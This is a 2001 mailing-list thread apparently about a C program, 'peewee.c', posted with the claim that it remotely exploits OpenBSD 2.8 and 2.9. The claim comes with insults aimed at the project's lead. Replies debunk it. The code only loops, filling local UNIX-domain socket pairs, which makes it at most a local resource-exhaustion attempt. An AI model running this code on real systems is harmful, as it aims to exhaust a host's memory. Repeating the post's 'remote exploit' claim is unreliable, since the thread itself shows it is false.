Unless this is part of something larger, it's current form is entirely bogus. _UNIX is a UNIX domain socket. There is no "remote" exploit here. I think the individual is upset about something. Nothing like publicly making an .. well, you know. "man socket" and search for AF_UNIX if you are curious. -brad At 02:03 PM 6/6/2001 -0400, max wrote: >The code doesnt do anything. I ran it on an obsd 2.8 machine and the state >of the machine after execution was same as before. From what i understand >from this code, it simply opens up a 2 local (PF_UNIX) sockets, and writes >some garbage to both of them. socket option calls change recieve and >send buffers on the socket, which i guess has something to do with the >size of the garbage we send to the local sockets. fcntl call sets non >block flag on the sockets (im not sure i understand what this is, and the >man pages are rather concise on this, but i guess it makes it a non-block >device?), and then two write calls, where the crap gets written into >sockets. >now, i am by no means an expert or even an experienced programmer, and >this analysis is my attempt to understand unix programming better, so >please, all flames are welcome. im posting this just to see if my >assumtions are correct, not to actually give a guru-level analysis. (so if >this isnt posted, i'll live) > >thanks for letting me waste everyone's time : ) > >max > > > > > Fsck Theo Dumbraadt wrote: > > > > > > This code shows a remote exploit for opensbsd versions 2.8 and 2.9 > > > > > > and can now be released to the public to break theo's 4 years without > > > > > > remote exploits sayings. I wrote it while people told me it could not > > > > > > happen on the list so here is your proofs bitch. > > > > > > // > > > > > > // peewee.c > > > > > > // peewee herman prove of consept this code will show all of the > > > > > > // world how vulnirable OpenBSD is and how Theo Dumbraadt is > > > > > > // not more than a liar copyraadt 2001 by Jigglypuff > > > > > > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg > > > > > > // this proggie is GPL licensed to those who use it keep my > > > > > > // credits and not be a lamer > > > > > > // > > > > > > #include <unistd.h> > > > > > > #include <sys/socket.h> > > > > > > #include <fcntl.h> > > > > > > #define BUFFERSIZE 409600 > > > > > > extern int > > > > > > main(void) > > > > > > { > > > > > > int p[2], i; > > > > > > char crap[BUFFERSIZE]; > > > > > > while (1) > > > > > > { > > > > > > if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) > > > > > > break; > > > > > > i = BUFFERSIZE; > > > > > > setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > > > > > > setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > > > > > > setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > > > > > > setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > > > > > > fcntl(p[0], F_SETFL, O_NONBLOCK); > > > > > > fcntl(p[1], F_SETFL, O_NONBLOCK); > > > > > > write(p[0], crap, BUFFERSIZE); > > > > > > write(p[1], crap, BUFFERSIZE); > > > > > > } > > > > > > return(0); > > > > > > } > > > > > > * Get your free email at http://www.inbox.net > >
This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 22:20:42 PDT
